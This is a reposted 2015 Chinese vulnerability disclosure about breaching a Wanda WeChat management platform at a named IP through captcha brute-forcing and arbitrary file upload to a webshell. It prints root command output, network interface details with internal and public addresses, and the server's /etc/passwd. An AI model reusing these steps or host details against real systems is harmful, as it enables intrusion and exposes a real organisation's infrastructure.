精选国内外互联网行业最新文章及报告,让网友获得最新的海内外互联网动态
当前位置:主页 > 互联网 > 网络安全 >

万达某产品公众管理平台Getshell至站点沦陷

2015-01-20 11:41 来源: 编辑:admin

沦陷站点:万达大歌星微信公众管理平台http://222.222.121.167/


由于验证码缺陷可爆破进入系统admin管理员用户,此处不表

 
微信管理平台嘛就有管理功能,稍微贴两张图


菜单管理


粉丝统计


可帮忙运营旗下微信账号呢,设置业务互动流程环节内容!数据未动哦


任意文件上传getshell


大歌星就在里面呀

命令执行

[/data1/workspace/tomcat-6.0.37/webapps/ROOT/images/upload/knowledgeBase/]$ id

uid=0(root) gid=0(root) groups=0(root)

 

 

[/data1/workspace/tomcat-6.0.37/webapps/ROOT/images/upload/knowledgeBase/]$ ifconfig

em1       Link encap:Ethernet  HWaddr 90:B1:1C:45:94:97 

          inet addr:10.77.131.12  Bcast:10.77.131.255  Mask:255.255.255.0

          inet6 addr: fe80::92b1:1cff:fe45:9497/64 Scope:Link

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

          RX packets:126775219 errors:0 dropped:1 overruns:0 frame:165

          TX packets:141442999 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:1000

          RX bytes:11262360533 (10.4 GiB)  TX bytes:13617809937 (12.6 GiB)

          Interrupt:16

 

em2       Link encap:Ethernet  HWaddr 90:B1:1C:45:94:98 

          inet addr:222.222.121.167  Bcast:222.222.121.255  Mask:255.255.255.0

          inet6 addr: fe80::92b1:1cff:fe45:9498/64 Scope:Link

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

          RX packets:218861101 errors:0 dropped:0 overruns:0 frame:0

          TX packets:33309686 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:1000

          RX bytes:16119265275 (15.0 GiB)  TX bytes:14034877342 (13.0 GiB)

          Interrupt:17

 

lo        Link encap:Local Loopback 

          inet addr:127.0.0.1  Mask:255.0.0.0

          inet6 addr: ::1/128 Scope:Host

          UP LOOPBACK RUNNING  MTU:16436  Metric:1

          RX packets:127928346 errors:0 dropped:0 overruns:0 frame:0

          TX packets:127928346 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:0

          RX bytes:50237812233 (46.7 GiB)  TX bytes:50237812233 (46.7 GiB)


内往外iP

 

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

tcpdump:x:72:72::/:/sbin/nologin

sre:x:504:505::/home/sre:/bin/bash

wddssa:x:505:506::/home/wddssa:/bin/bash

nagios:x:498:499::/var/spool/nagios:/sbin/nologin

puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin

nrpe:x:497:498:NRPE user for the NRPE service:/var/run/nrpe:/sbin/nologin

apache:x:48:48:Apache:/var/www:/sbin/nologin

zabbix:x:496:497:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin

mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

memcached:x:495:496:Memcached daemon:/var/run/memcached:/sbin/nologin


修复方案:
据说上次给了一个给你们了,一起表示一下吧-0-

标签
你喜欢的文章
返回首页
扫描微信
返回顶部